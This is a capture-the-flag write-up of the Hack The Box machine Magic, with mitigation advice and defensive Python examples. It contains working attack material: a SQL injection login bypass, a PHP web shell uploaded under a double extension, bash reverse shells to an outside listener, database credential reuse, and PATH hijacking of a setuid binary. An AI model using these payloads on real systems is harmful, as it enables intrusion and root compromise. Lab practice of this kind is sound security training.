
Magic HTB Writeup

Executive Summary

A penetration test of the Magic HTB machine (10.129.49.31) found a chain of vulnerabilities leading from unauthenticated access to root: a SQL injection authentication bypass in the login form, an image upload that accepted a PHP web shell with a double extension and gave remote code execution, database credentials stored in plaintext under the web root and reused for the local user theseus, and privilege escalation through PATH hijacking of a root-owned SUID binary that invokes fdisk by relative name.

Reconnaissance

Network Scanning

Target Declaration:

export target=10.129.49.31


Comprehensive Port Discovery:

sudo nmap -p- --min-rate 5000 -sT -vvv $target


Service Enumeration (the full port scan found only 22/tcp and 80/tcp open):

sudo nmap -p 22,80 -sC -sV -T4 $target


Findings

Web Application Assessment

Initial Discovery

Visiting http://10.129.49.31 revealed a web application with a login portal at /login.php.


Authentication Bypass

SQL Injection Vulnerability: the login form concatenates the submitted username and password into its SQL query without parameterization.

Payload Used:

Username: admin
Password: pass' OR 1=1-- -

The single quote closes the password string, OR 1=1 makes the WHERE clause true for every row, and -- - comments out the rest of the query (MySQL requires whitespace after --, which is why the payload ends in a space and a dash). The application accepted the login.

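To make the bypass concrete, here is an added example (not the Magic application's code) that builds the login query the two ways: by string concatenation, as a vulnerable login.php does, and with bound parameters. It uses an in-memory SQLite database with a constructed users table; the table and column names and the stored password are assumptions, not the target's schema.

```python
import sqlite3

# Constructed sample data: one account, not taken from the target database.
SAMPLE_USER = ("admin", "correct-horse-battery")
PAYLOAD = "pass' OR 1=1-- -"   # the password value submitted in the writeup


def make_db() -> sqlite3.Connection:
    """In-memory database standing in for the MySQL 'Magic' database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES (?, ?)", SAMPLE_USER)
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """String concatenation: the user's input becomes part of the SQL text."""
    return (
        "SELECT username FROM login "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # With PAYLOAD the WHERE clause reads:
    #   username = 'admin' AND password = 'pass' OR 1=1-- -'
    # The quote closes the string, OR 1=1 is true for every row, and
    # everything after -- is a comment, so the query returns a row.
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row is not None


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver passes the values separately from the SQL,
    so a quote in the password is compared as data, never parsed as syntax."""
    row = conn.execute(
        "SELECT username FROM login WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_login(db, "admin", PAYLOAD))   # True: bypassed
    print("parameterized:", safe_login(db, "admin", PAYLOAD))      # False
```

SQLite accepts -- as a comment without the trailing space that MySQL needs, so the same payload works against both; the parameterized version compares the literal string pass' OR 1=1-- - against the stored password and fails.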

Directory Enumeration

Gobuster Scan:

gobuster dir -u http://$target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50


Key Findings:

Initial Access

File Upload Vulnerability


Upload Bypass Technique: the authenticated upload form only checks that the upload looks like an image (file extension, Content-Type header and magic bytes). All of those checks are satisfied by a file whose name ends in .png but also carries .php (script.php.png), whose content starts with a PNG header line, and whose body is PHP code. The server still executes the PHP in the uploaded file, as shown below.

PHP Web Shell (script.php.png):

PNG
<?php system($_GET['cmd']); ?>

The server responded with an upload success message, and the file was stored under /images/uploads/.

Remote Code Execution

Command Execution:

http://10.129.49.31/images/uploads/script.php.png?cmd=id


Reverse Shell Payload (URL-encoded and passed as the cmd parameter, with a listener on 10.10.14.134:9001 started first):

bash -c 'bash -i >& /dev/tcp/10.10.14.134/9001 0>&1'


Shell Obtained: the reverse shell connected back to the listener on port 9001.

Post-Exploitation

Database Credential Discovery

Location: /var/www/Magic/db.php5

Credentials Found:

private static $dbName = 'Magic';
private static $dbHost = 'localhost';
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';


Database Enumeration

MySQL Dump:

mysqldump -u theseus -p Magic


Additional Credentials Discovered: the dump contained a second plaintext password, Th3s3usW4sK1ng. It was reused for the local user theseus: switching user (su theseus) with that password succeeded.

User Access

SSH Access:

ssh -i key theseus@10.129.49.31

Note: if you do not already have a key pair, run ssh-keygen on your local machine, then (from the theseus shell obtained above) append the contents of key.pub to /home/theseus/.ssh/authorized_keys on the target and connect with the private key: ssh -i key theseus@10.129.49.31. This gives a stable session that survives the loss of the reverse shell.


User Flag:

cat /home/theseus/user.txt
9f6d3eacdb81678cfd6c06d3e82dc76d

Privilege Escalation

SUID Binary Analysis

Vulnerable Binary:

find / -perm -4000 -type f -user root -ls 2>/dev/null
/bin/sysinfo

Note: search for setuid binaries owned by root with find / -perm -4000 -type f -user root -ls 2>/dev/null. The result of interest is /bin/sysinfo: root-owned, setuid, and group-owned by a group that theseus belongs to, so theseus can execute it and it runs with root privileges.


Binary Analysis:

ltrace /bin/sysinfo

Vulnerability: ltrace shows sysinfo invoking fdisk by its bare name instead of an absolute path. The command is resolved through the PATH of the user who runs the binary, while the process itself runs as root.

PATH Hijacking Exploitation

Malicious fdisk Payload:

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.134/4444 0>&1"


Exploitation Steps:

# Create payload
echo '#!/bin/bash' > /dev/shm/fdisk
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.134/4444 0>&1"' >> /dev/shm/fdisk
chmod +x /dev/shm/fdisk

# Hijack PATH
export PATH="/dev/shm:$PATH"

# Execute vulnerable binary
/bin/sysinfo
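The resolution step that makes the attack work, as an added example (not a reproduction of /bin/sysinfo): a fake fdisk is planted in a throwaway directory, that directory is prepended to PATH, and a command run the way sysinfo runs it resolves to the fake. The hardened invocation uses an absolute path, no shell and a fixed PATH. The fake script prints a marker instead of spawning the reverse shell; the function names and the TRUSTED_PATH value are assumptions.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# Fixed search path a privileged program should set itself (assumed value).
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def plant_fake(dirpath: str, name: str = "fdisk") -> str:
    """Drop an executable script named like the hijacked command.
    Same mechanism as the /dev/shm/fdisk payload, but it only prints a marker."""
    path = os.path.join(dirpath, name)
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return path


def resolve(command: str, path_env: str):
    """What /bin/sh does for a bare name: first executable match in PATH wins."""
    return shutil.which(command, path=path_env)


def run_like_sysinfo(command_line: str, path_env: str) -> str:
    """Vulnerable pattern: a shell command line with a bare program name,
    executed with whatever PATH the caller supplied (a SUID binary that
    calls system()/popen() inherits it the same way)."""
    proc = subprocess.run(command_line, shell=True, capture_output=True,
                          text=True, env={"PATH": path_env})
    return proc.stdout.strip()


def run_hardened(argv: list) -> str:
    """Absolute path, argument vector instead of a shell string, and a PATH
    the program chose itself, so nothing the caller controls picks the binary."""
    if not os.path.isabs(argv[0]):
        raise ValueError(f"refusing relative program name: {argv[0]}")
    proc = subprocess.run(argv, capture_output=True, text=True,
                          env={"PATH": TRUSTED_PATH})
    return proc.stdout.strip()


def demo() -> dict:
    """Stage the hijack in a temporary directory and report what resolved."""
    with tempfile.TemporaryDirectory() as workdir:
        fake = plant_fake(workdir)
        hijacked_path = f"{workdir}:{TRUSTED_PATH}"   # export PATH="/dev/shm:$PATH"
        return {
            "fake": fake,
            "resolved_hijacked": resolve("fdisk", hijacked_path),
            "resolved_trusted": resolve("fdisk", TRUSTED_PATH),
            "output_hijacked": run_like_sysinfo("fdisk -l", hijacked_path),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In C the equivalent fix is execve() of an absolute path with a controlled envp, or at least setting PATH to a known value and clearing inherited variables before calling system() or popen(); the strongest fix is removing the setuid bit from sysinfo altogether, since nothing it does needs root for the caller.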

Root Access Achieved

Root Flag:

cat /root/root.txt
7bcb8be400199d35a96ce942c767a9f1

Vulnerability Analysis

Critical Security Issues

  1. SQL Injection (Critical)
    • Unparameterized user input in the login query
    • Complete authentication bypass with a single payload
  2. Insecure File Upload (Critical)
    • Insufficient file type validation (extension, Content-Type and magic bytes only)
    • Magic byte and Content-Type manipulation
    • Double extension bypass (.php.png) executed as PHP by the server
  3. Insecure SUID Binary (High)
    • Relative command name (fdisk) in a root-owned setuid binary
    • PATH environment variable inherited from the caller and hijackable
    • No absolute path or sanitized environment
  4. Information Disclosure and Credential Reuse (Medium)
    • Database credentials in the web root (db.php5)
    • Plaintext password storage in the database
    • Database password reused for the local user theseus

Mitigation Recommendations

Immediate Actions

  1. Input Validation
    • Use prepared statements with bound parameters for every database query
    • Validate and normalize user input server-side; sanitization alone is not a substitute for parameterization
  2. File Upload Security
    • Verify file type server-side by parsing the image, not by extension or Content-Type
    • Allow a whitelist of extensions and reject names with more than one extension
    • Store uploads outside the web root under server-generated names, and serve them without a PHP handler
    • Scan uploaded files for malicious content
  3. System Hardening
    • Audit all SUID binaries and remove the setuid bit where it is not required
    • Use absolute paths for every command a privileged program executes and reset PATH before doing so
    • Implement the principle of least privilege

Long-term Improvements

  1. Secure Development
    • Regular security code reviews
    • Implement security testing in CI/CD pipeline
    • Developer security training
  2. Monitoring & Detection
    • File integrity monitoring
    • Web application firewall
    • Intrusion detection system

Technical Indicators

Attack Timeline

  1. Network reconnaissance
  2. Web application enumeration
  3. SQL injection authentication bypass
  4. File upload exploitation
  5. Remote code execution
  6. Database credential discovery
  7. User privilege escalation
  8. SUID binary exploitation
  9. Root compromise

Tools Utilized

  • nmap (port and service discovery)
  • gobuster (directory enumeration)
  • ltrace (library call tracing of /bin/sysinfo)
  • mysqldump (database extraction)
  • ssh and ssh-keygen (persistent user access)

Exploitation Techniques

  • SQL injection authentication bypass
  • File upload filter bypass (double extension and image magic bytes)
  • PHP web shell and reverse shell
  • Credential reuse from the database to a local account
  • PATH hijacking of a SUID binary